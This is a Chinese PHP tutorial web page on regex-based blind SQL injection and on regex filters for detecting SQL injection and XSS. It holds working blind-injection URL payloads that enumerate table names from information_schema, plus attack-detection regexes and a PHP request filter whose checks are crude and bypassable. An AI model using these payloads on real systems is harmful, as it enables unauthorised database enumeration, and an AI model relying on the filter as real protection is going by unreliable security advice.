php中常见的sql攻击正则表达式
发布:smiling 来源: PHP粉丝网 添加日期:2014-08-21 14:28:40 浏览: 评论:0
正则表达式注入攻击你sql数据库本人是第一次听过了,下面我总结了一些常见的sql攻击正则表达式同时在文章最后也举了一个实例与大家一起分析攻击原理.
我们都已经知道,在MYSQL 5+中 information_schema库中存储了所有的 库名,表明以及字段名信息,故攻击方式如下:
1.判断第一个表名的第一个字符是否是a-z中的字符,其中blind_sqli是假设已知的库名。
注:正则表达式中 ^[a-z] 表示字符串中开始字符是在 a-z范围内,代码如下:
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-z]' LIMIT 0,1) /*
2.判断第一个字符是否是a-n中的字符,代码如下:
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-n]' LIMIT 0,1)/*
3.确定该字符为n,代码如下:
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^n' LIMIT 0,1) /* www.phpfensi.com
4.表达式的更换如下,代码如下:
expression like this: '^n[a-z]' -> '^ne[a-z]' -> '^new[a-z]' -> '^news[a-z]' -> FALSE
这时说明表名为news,要验证是否是该表明 正则表达式为'^news$',但是没这必要 直接判断 table_name = ’news‘ 不就行了.
5.接下来猜解其它表了 只需要修改 limit 1,1 -> limit 2,1就可以对接下来的表进行盲注了.
例,代码如下:
- $Exec_Commond = "( \s|\S)*(exec(\s|\+)+(s|x)p\w+)(\s|\S)*";
- $Simple_XSS = "( \s|\S)*((%3C)|<)((%2F)|/)*[a-z0-9%]+((%3E)|>)(\s|\S)*";
- $Eval_XSS = "( \s|\S)*((%65)|e)(\s)*((%76)|v)(\s)*((%61)|a)(\s)*((%6C)|l)(\s|\S)*";
- $Image_XSS = "( \s|\S)*((%3C)|<)((%69)|i|I|(%49))((%6D)|m|M|(%4D))((%67)|g|G|(%47))[^\n]+((%3E)|>)(\s|\S)*" ;
- $Script_XSS = "( \s|\S)*((%73)|s)(\s)*((%63)|c)(\s)*((%72)|r)(\s)*((%69)|i)(\s)*((%70)|p)(\s)*((%74)|t)(\s|\S)*";
- $SQL_Injection = "( \s|\S)*((%27)|(')|(%3D)|(=)|(/)|(%2F)|(")|((%22)|(-|%2D){2})|(%23)|(%3B)|(;))+(\s|\S)*";
sql攻击代码,代码如下:
- <?php
- function customError($errno, $errstr, $errfile, $errline)
- {
- echo "<b>Error number:</b> [$errno],error on line $errline in $errfile<br />";
- die();
- }
- set_error_handler("customError",E_ERROR);
- $getfilter="'|(and|or)\b.+?(>|<|=|in|like)|\/\*.+?\*\/|<\s*script\b|\bEXEC\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\s+(TABLE|DATABASE)";
- $postfilter="\b(and|or)\b.{1,6}?(=|>|<|\bin\b|\blike\b)|\/\*.+?\*\/|<\s*script\b|\bEXEC\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\s+(TABLE|DATABASE)";
- $cookiefilter="\b(and|or)\b.{1,6}?(=|>|<|\bin\b|\blike\b)|\/\*.+?\*\/|<\s*script\b|\bEXEC\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\s+(TABLE|DATABASE)";
- function StopAttack($StrFiltKey,$StrFiltValue,$ArrFiltReq)
- {
- if(is_array($StrFiltValue))
- {
- $StrFiltValue=implode($StrFiltValue);
- }
- if (preg_match("/".$ArrFiltReq."/is",$StrFiltValue)==1&&!isset($_REQUEST['securityToken']))
- {
- slog("<br><br>操作IP: ".$_SERVER["REMOTE_ADDR"]."<br>操作时间: ".strftime("%Y-%m-%d %H:%M:%S")."<br>操作页面:".$_SERVER["PHP_SELF"]."<br>提交方式: ".$_SERVER["REQUEST_METHOD"]."<br>提交参数: ".$StrFiltKey."<br>提交数据: ".$StrFiltValue);
- print "result notice:Illegal operation!";
- exit();
- }
- }
- foreach($_GET as $key=>$value)
- {
- StopAttack($key,$value,$getfilter);
- }
- foreach($_POST as $key=>$value)
- {
- StopAttack($key,$value,$postfilter);
- }
- foreach($_COOKIE as $key=>$value)
- {
- StopAttack($key,$value,$cookiefilter);
- }
- function slog($logs)
- { //开源代码phpfensi.com
- $toppath="log.htm";
- $Ts=fopen($toppath,"a+");
- fputs($Ts,$logs."rn");
- fclose($Ts);
- }
- ?>
sql分析:
如果使用这个函数的话,这个函数会绕开PHP的标准出错处理,所以说得自己定义报错处理程序(die()).
其次,如果代码执行前就发生了错误,那个时候用户自定义的程序还没有执行,所以就不会用到用户自己写的报错处理程序.
那么,PHP里有一套错误处理机制,可以使用set_error_handler()接管PHP错误处理,也可以使用trigger_error()函数主动抛出一个错误.
set_error_handler()函数设置用户自定义的错误处理函数,函数用于创建运行期间的用户自己的错误处理方法,它需要先创建一个错误处理函数,然后设置错误级别.
关于其用法,代码如下:
- function customError($errno, $errstr, $errfile, $errline)
- {
- echo "<b>错误代码:</b> [${errno}] ${errstr}\r\n";
- echo " 错误所在的代码行: {$errline} 文件{$errfile}\r\n";
- echo " PHP版本 ",PHP_VERSION, "(" , PHP_OS, ")\r\n";
- // die();
- //开源代码phpfensi.com
- }
- set_error_handler("customError",E_ALL| E_STRICT);
总结:PHP遇到错误时,就会给出出错脚本的位置、行数和原因,有很多人说,这并没有什么大不了,但泄露了实际路径的后果是不堪设想的,对于某些入侵者,这个信息可是非常重要,而事实上现在有很多的服务器都存在这个问题,有些网管干脆把PHP配置文件中的 display_errors 设置为 Off 来解决,但本人认为这个方法过于消极,有些时候,我们的确需要PHP返回错误的信息以便调试,而且在出错时也可能需要给用户一个交待,甚至导航到另一页面,但是有了set_error_handler()之后,这些矛盾也都可以解决掉了,但是发现很少用这个函数.
Tags: php正则 php防攻击 sql攻击
相关文章
- ·php正则连接中文本程序(2013-11-12)
- ·三分钟学会PHP正则表达式(2013-11-13)
- ·巧用PHP正则表达式判断IP地址(2013-11-13)
- ·php用户注册时常用的一些检验函数总结(2014-01-05)
- ·php中ip地址 email格式 电话号码正则验证(2014-01-06)
- ·php正则字符串中图片地址表达式(2014-01-15)
- ·php 汉字正则表达式实例详解(2014-07-07)
- ·php 获取网页内的图片地址正则表达式(2014-07-18)
- ·php正则获取关键字、标题、网页描述代码(2014-07-24)
- ·php正则表达式替换URL链接地址为指定url(2014-07-26)
- ·php中网址、email、手机号码正则表达代码(2014-07-29)
- ·php中常用的正则表达式规则总结(2014-07-30)
- ·php中固定电话号码和手机号码正则表达式验证(2014-07-30)
- ·php利用正则过滤链接、标签,空格,换行符程序(2014-07-30)
- ·php 手机号码正则表达试程序代码(2014-07-31)
- ·php正则表达式之正则字符中的图片地址(2014-08-01)
推荐文章
热门文章
最新评论文章
- 写给考虑创业的年轻程序员(10)
- PHP新手上路(一)(7)
- 惹恼程序员的十件事(5)
- PHP邮件发送例子,已测试成功(5)
- 致初学者:PHP比ASP优秀的七个理由(4)
- PHP会被淘汰吗?(4)
- PHP新手上路(四)(4)
- 如何去学习PHP?(2)
- 简单入门级php分页代码(2)
- php中邮箱email 电话等格式的验证(2)